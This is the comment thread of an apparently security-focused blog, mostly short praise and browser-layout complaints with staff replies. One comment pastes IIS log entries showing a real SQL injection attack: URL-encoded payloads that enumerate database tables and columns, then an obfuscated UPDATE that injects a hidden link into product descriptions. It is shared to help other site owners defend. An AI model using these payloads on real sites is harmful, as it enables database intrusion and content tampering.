Related Articles

9 Comments

  1. 1

    freesoft

    Thank you..really informative!!

    Like or Dislike: Thumb up 0 Thumb down 0

  2. 2

    Sook

    Where exactly is the facebook like button ?

    Like or Dislike: Thumb up 0 Thumb down 0

  3. 3

    Cortez

    hi, superb blog site, and a very good understand! at least one for my bookmarking.

    Like or Dislike: Thumb up 0 Thumb down 0

  4. 4

    eivai

    Good to see that some people really write good content nowadays. Offtopic: I don’t know why but i’m having javascript errors viewing your website on Internet Explorer.. can you check it please? Best Regards

    Like or Dislike: Thumb up 0 Thumb down 0

  5. 5

    Stanford Thall

    I really like what you post here. Very insightful and intelligent. One problem though. I’m running Opera with Debian and parts of your current layout pieces are a little wonky. I realize it’s not a typical set up. Yet it’s something to keep in mind. I hope that it will help and continue to keep up the top quality writing.

    Like or Dislike: Thumb up 0 Thumb down 0

    1. 5.1

      R Sachin

      Hello,

      Your query has been forwarded. we will check it out.

      regards
      Sachin R

      Like or Dislike: Thumb up 0 Thumb down 0

  6. 6

    botox Kraków

    I quite enjoy what you submit right here. Particularly insightful and intelligent. One concern though. I’m running Firefox with Debian and parts of your current web design pieces are a little wonky. I realize it’s not a popular set up. But it’s an issue to hold in the mind. I wish that it will probably help and keep the top rated quality writing.

    Like or Dislike: Thumb up 0 Thumb down 0

    1. 6.1

      R Sachin

      Hello,

      We are looking into this . hopefully the issue will be resolved before the next blog is published.

      regards
      Sachin R

      Like or Dislike: Thumb up 0 Thumb down 0

  7. 7

    Leon

    Interesting blog.

    It seems like the attack happens in two separate steps:

    1. Get table and column structure
    =============================
    The attacker visits and get information on the table and column structure of the database with the following (as I picked up from the IIS log files on a site I have that got infected – Windows 2008, IIS7 and SQL Server 2008):

    2011-04-09 22:49:17 myserverip GET /ViewProduct.aspx
    ProductId=1%27%20or%201%3D(select%20top%201%20cast(checksum(*)%20as%20nvarchar)%2Bchar(0x7e)%2Btable%5Fname%20from%20information%5Fschema.tables%20%20where%20checksum(*)%3E-1196899800%20order%20by%20checksum(*))–
    80 – 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 519 …lots
    of these

    so from the information_schema.tables view it gets the table names.

    Then it gets the column names as follows:

    2011-04-09 22:49:28 myserverip GET /ViewProduct.aspx
    ProductId=1%27%20or%201%3D(select%20top%201%20cast(ordinal%5Fposition%20as%20nvarchar)%2Bchar(0x7e)%2Bcolumn%5Fname%2Bchar(0x7e)%2Bdata%5Ftype%20from%20information%5Fschema.columns%20where%20ordinal%5Fposition%3D1%20%20and%20table%5Fname%3Dchar(111)%2Bchar(114)%2Bchar(100)%2Bchar(101)%2Bchar(114)%2Bchar(105)%2Bchar(116)%2Bchar(101)%2Bchar(109)%20order%20by%20ordinal%5Fposition)–
    80 – 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 785 …
    lots of these as well

    from the information_schema.columns view

    2. Malicious table update
    ===================
    A few days later other visits happen. As the attacker now has the database structure – he can be very specific and update Description columns with the junk.

    2011-04-19 15:32:58 myserverip GET /products.aspx
    Category=Paintball%20Kits1’+update+product+set+Description=cast(Description+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(97)%2Bchar(32)%2Bchar(115)%2Bchar(116)%2Bchar(121)%2Bchar(108)%2Bchar(101)%2Bchar(61)%2Bchar(100)%2Bchar(105)%2Bchar(115)%2Bchar(112)%2Bchar(108)%2Bchar(97)%2Bchar(121)%2Bchar(58)%2Bchar(110)%2Bchar(111)%2Bchar(110)%2Bchar(101)%2Bchar(59)%2Bchar(32)%2Bchar(104)%2Bchar(114)%2Bchar(101)%2Bchar(102)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(102)%2Bchar(117)%2Bchar(108)%2Bchar(97)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(32)%2Bchar(62)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(60)%2Bchar(47)%2Bchar(97)%2Bchar(62)+as+varchar(8000))–
    80 – 194.28.44.190
    Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/

    Hope it helps someone

    Like or Dislike: Thumb up 0 Thumb down 0

Comments are closed.

Copyright © 2017 MicroWorld Technologies Inc. - Anti-Virus escanav.com